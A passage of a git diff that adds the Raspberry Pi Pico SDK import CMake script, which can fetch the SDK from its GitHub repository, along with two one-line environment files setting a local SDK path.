+# disclaimer in the documentation and/or other materials provided with the distribution.
+#
+# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
+# derived from this software without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
+# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
+# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+if (DEFINED ENV{PICO_SDK_PATH} AND (NOT PICO_SDK_PATH))
+ set(PICO_SDK_PATH $ENV{PICO_SDK_PATH})
+ message("Using PICO_SDK_PATH from environment ('${PICO_SDK_PATH}')")
+endif ()
+
+if (DEFINED ENV{PICO_SDK_FETCH_FROM_GIT} AND (NOT PICO_SDK_FETCH_FROM_GIT))
+ set(PICO_SDK_FETCH_FROM_GIT $ENV{PICO_SDK_FETCH_FROM_GIT})
+ message("Using PICO_SDK_FETCH_FROM_GIT from environment ('${PICO_SDK_FETCH_FROM_GIT}')")
+endif ()
+
+if (DEFINED ENV{PICO_SDK_FETCH_FROM_GIT_PATH} AND (NOT PICO_SDK_FETCH_FROM_GIT_PATH))
+ set(PICO_SDK_FETCH_FROM_GIT_PATH $ENV{PICO_SDK_FETCH_FROM_GIT_PATH})
+ message("Using PICO_SDK_FETCH_FROM_GIT_PATH from environment ('${PICO_SDK_FETCH_FROM_GIT_PATH}')")
+endif ()
+
+if (DEFINED ENV{PICO_SDK_FETCH_FROM_GIT_TAG} AND (NOT PICO_SDK_FETCH_FROM_GIT_TAG))
+ set(PICO_SDK_FETCH_FROM_GIT_TAG $ENV{PICO_SDK_FETCH_FROM_GIT_TAG})
+ message("Using PICO_SDK_FETCH_FROM_GIT_TAG from environment ('${PICO_SDK_FETCH_FROM_GIT_TAG}')")
+endif ()
+
+if (PICO_SDK_FETCH_FROM_GIT AND NOT PICO_SDK_FETCH_FROM_GIT_TAG)
+ set(PICO_SDK_FETCH_FROM_GIT_TAG "master")
+ message("Using master as default value for PICO_SDK_FETCH_FROM_GIT_TAG")
+endif()
+
+set(PICO_SDK_PATH "${PICO_SDK_PATH}" CACHE PATH "Path to the Raspberry Pi Pico SDK")
+set(PICO_SDK_FETCH_FROM_GIT "${PICO_SDK_FETCH_FROM_GIT}" CACHE BOOL "Set to ON to fetch copy of SDK from git if not otherwise locatable")
+set(PICO_SDK_FETCH_FROM_GIT_PATH "${PICO_SDK_FETCH_FROM_GIT_PATH}" CACHE FILEPATH "location to download SDK")
+set(PICO_SDK_FETCH_FROM_GIT_TAG "${PICO_SDK_FETCH_FROM_GIT_TAG}" CACHE FILEPATH "release tag for SDK")
+
+if (NOT PICO_SDK_PATH)
+ if (PICO_SDK_FETCH_FROM_GIT)
+ include(FetchContent)
+ set(FETCHCONTENT_BASE_DIR_SAVE ${FETCHCONTENT_BASE_DIR})
+ if (PICO_SDK_FETCH_FROM_GIT_PATH)
+ get_filename_component(FETCHCONTENT_BASE_DIR "${PICO_SDK_FETCH_FROM_GIT_PATH}" REALPATH BASE_DIR "${CMAKE_SOURCE_DIR}")
+ endif ()
+ FetchContent_Declare(
+ pico_sdk
+ GIT_REPOSITORY https://github.com/raspberrypi/pico-sdk
+ GIT_TAG ${PICO_SDK_FETCH_FROM_GIT_TAG}
+ )
+
+ if (NOT pico_sdk)
+ message("Downloading Raspberry Pi Pico SDK")
+ # GIT_SUBMODULES_RECURSE was added in 3.17
+ if (${CMAKE_VERSION} VERSION_GREATER_EQUAL "3.17.0")
+ FetchContent_Populate(
+ pico_sdk
+ QUIET
+ GIT_REPOSITORY https://github.com/raspberrypi/pico-sdk
+ GIT_TAG ${PICO_SDK_FETCH_FROM_GIT_TAG}
+ GIT_SUBMODULES_RECURSE FALSE
+
+ SOURCE_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-src
+ BINARY_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-build
+ SUBBUILD_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-subbuild
+ )
+ else ()
+ FetchContent_Populate(
+ pico_sdk
+ QUIET
+ GIT_REPOSITORY https://github.com/raspberrypi/pico-sdk
+ GIT_TAG ${PICO_SDK_FETCH_FROM_GIT_TAG}
+
+ SOURCE_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-src
+ BINARY_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-build
+ SUBBUILD_DIR ${FETCHCONTENT_BASE_DIR}/pico_sdk-subbuild
+ )
+ endif ()
+
+ set(PICO_SDK_PATH ${pico_sdk_SOURCE_DIR})
+ endif ()
+ set(FETCHCONTENT_BASE_DIR ${FETCHCONTENT_BASE_DIR_SAVE})
+ else ()
+ message(FATAL_ERROR
+ "SDK location was not specified. Please set PICO_SDK_PATH or set PICO_SDK_FETCH_FROM_GIT to on to fetch from git."
+ )
+ endif ()
+endif ()
+
+get_filename_component(PICO_SDK_PATH "${PICO_SDK_PATH}" REALPATH BASE_DIR "${CMAKE_BINARY_DIR}")
+if (NOT EXISTS ${PICO_SDK_PATH})
+ message(FATAL_ERROR "Directory '${PICO_SDK_PATH}' not found")
+endif ()
+
+set(PICO_SDK_INIT_CMAKE_FILE ${PICO_SDK_PATH}/pico_sdk_init.cmake)
+if (NOT EXISTS ${PICO_SDK_INIT_CMAKE_FILE})
+ message(FATAL_ERROR "Directory '${PICO_SDK_PATH}' does not appear to contain the Raspberry Pi Pico SDK")
+endif ()
+
+set(PICO_SDK_PATH ${PICO_SDK_PATH} CACHE PATH "Path to the Raspberry Pi Pico SDK" FORCE)
+
+include(${PICO_SDK_INIT_CMAKE_FILE})
diff --git a/sdk.env b/sdk.env
new file mode 100644
index 0000000..fe93277
--- /dev/null
+++ b/sdk.env
@@ -0,0 +1 @@
+export PICO_SDK_PATH=/home/ity/Repos/pico-sdk
diff --git a/sdk.nu b/sdk.nu
new file mode 100644
index 0000000..43f6752
--- /dev/null
+++ b/sdk.nu
@@ -0,0 +1 @@
+$env.PICO_SDK_PATH = '/home/ity/Repos/pico-sdk/'